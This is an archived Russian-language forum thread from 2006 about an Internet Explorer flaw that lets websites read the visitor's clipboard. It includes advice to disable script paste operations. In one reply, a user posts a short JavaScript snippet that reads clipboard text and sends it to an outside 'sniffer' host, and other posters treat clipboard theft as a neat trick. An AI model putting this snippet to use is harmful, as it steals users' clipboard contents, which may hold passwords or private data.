PDA

Просмотр полной версии : если вы используете Ie...


cyberlife
21.06.2006, 16:30
не знал куда закинуть....
Если вы используете Internet Explorer, содержимое вашего буфера обмена доступно всем. Один из пользователей digg.com опубликовал ссылку на веб-сайт, на котором демонстрируется возможность получения текста, находящегося в буфере обмена пользователя браузера Microsoft Internet Explorer в момент захода на веб-сайт.

здесь (http://www.jerryandmissy.com/work/clipboard.htm)

Этот случай лишний раз акцентрирует внимание на не безопасных настройках "по-умолчанию", которые применяет компания Microsoft в своих продуктах. Для отключения возможности получения содержимого вашего буфера обмена, во время просмотра веб-страниц необходимо отключить функцию "Allow Paste Operations via Script"("Разрешить операции вставки через сценарий"), которая находится во вкладке "Security/Безопасность->Custom Level Security/Другой..." окна настроек Internet Explorer.
узнал здесь - http://www.uinc.ru/news/sn6056.html

SanyaX
21.06.2006, 16:42
В жизни ие не использовал. А фича прикольная. Тырить буфер обмена.

-=lebed=-
21.06.2006, 17:08
Дак буфер выводится в броузере (локально), а как его содержимое переправить на сервер?

ZaCo
21.06.2006, 17:18
2-=lebed=- ++++++
глупая бага на самом деле. пройдет только в связке с си

pch
21.06.2006, 19:25
2 -=lebed=-
А ajax на что? Если нужен только IE, то вообще всё просто:

var req = new ActiveXObject("Microsoft.XMLHTTP");
req.open("GET", "http://snifer.ru/?s="+window.clipboardData.getData("Text"), true);
req.send(null);

-=lebed=-
22.06.2006, 15:49
Тот же код, только с комментами можно?
Через Оперу не прокатывает кстати.

cyberlife
22.06.2006, 16:10
Через Оперу не прокатывает кстати.
на тему посмотри...
зы. не сочтите за рекламу, просто здесь (http://forum.0day.kiev.ua/index.php?)
стоит мод(в самом низу) который явно показывает статистику по браузерам. что говорит о том сколько народу ездит на ослах.